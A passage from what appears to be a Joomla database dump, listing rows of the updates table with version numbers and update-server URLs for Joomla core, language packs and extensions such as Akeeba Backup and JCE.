NZ','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(29541,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(29542,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29543,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(29544,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(29545,57,0,'French','','pkg_fr-FR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(29546,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(29547,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(29548,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(29549,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(29550,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(29551,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(29552,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(29553,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(29554,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.28.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(29555,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(29556,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(29557,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(29558,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(29559,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(29560,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(29561,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(29562,57,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(29563,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(29564,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(29565,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(29566,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(29567,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(29568,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(29569,57,0,'English US','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(29570,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(29571,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(29572,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(29573,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(29574,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(29575,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(29576,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(29577,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(29578,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(29579,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(29580,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(29581,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(29582,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(29583,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(29584,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(29585,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(29586,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(29587,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(29588,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(29589,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(29590,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(29591,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(29592,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(29593,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(29594,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(29595,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(29596,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29597,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.5.0','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(29598,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'4.8.7','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-4-8-7			\n		',''),(29599,129,0,'JCE 2.9.10','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.10','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-10-released',''),(29600,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(29601,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29602,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29603,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29604,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29605,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29606,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29607,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29608,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29609,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29610,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29611,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29612,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29613,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29614,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29615,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29616,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29617,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29618,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29619,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29620,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29621,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29622,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29623,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29624,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29625,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29626,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29627,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29628,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29629,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29630,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29631,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29632,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29633,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29634,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29635,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29636,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29637,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29638,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29639,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29640,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29641,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29642,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29643,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29644,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29645,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29646,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.7','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-7.html',''),(29647,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29648,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29649,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29650,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29651,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.8','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-8.html',''),(29652,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29653,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29654,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29655,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.8','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-8.html',''),(29656,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29657,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29658,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.8','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-8.html',''),(29659,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29660,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29661,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29662,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.8','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-8.html',''),(29663,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29664,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29665,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29666,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29667,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.8','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-8.html',''),(29668,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29669,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29670,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29671,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29672,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.8','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-8.html',''),(29673,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29674,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29675,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29676,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29677,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.8','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-8.html',''),(29678,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29679,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29680,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29681,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.8','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-8.html',''),(29682,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29683,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29684,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29685,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29686,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.8','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-8.html',''),(29687,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29688,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29689,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29690,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.8','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-8.html',''),(29691,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29692,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29693,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.8','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-8.html',''),(29694,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29695,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29696,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29697,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29698,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29699,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.8','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-8.html',''),(29700,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29701,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29702,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.8','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-8.html',''),(29703,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29704,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29705,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29706,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29707,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29708,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-9.html',''),(29709,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29710,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29711,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-9.html',''),(29712,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29713,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29714,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29715,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29716,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-9.html',''),(29717,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29718,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(29719,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(29720,3,0,'French','','pkg_fr-FR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(29721,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(29722,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(29723,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(29724,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(29725,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(29726,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(29727,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(29728,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(29729,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.28.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(29730,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(29731,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(29732,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(29733,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(29734,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(29735,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(29736,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(29737,3,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(29738,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(29739,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(29740,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(29741,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(29742,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(29743,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(29744,3,0,'English US','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(29745,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(29746,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(29747,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(29748,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(29749,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(29750,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(29751,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(29752,3,0,'German DE','','pkg_de-DE','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(29753,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(29754,3,0,'Serbian 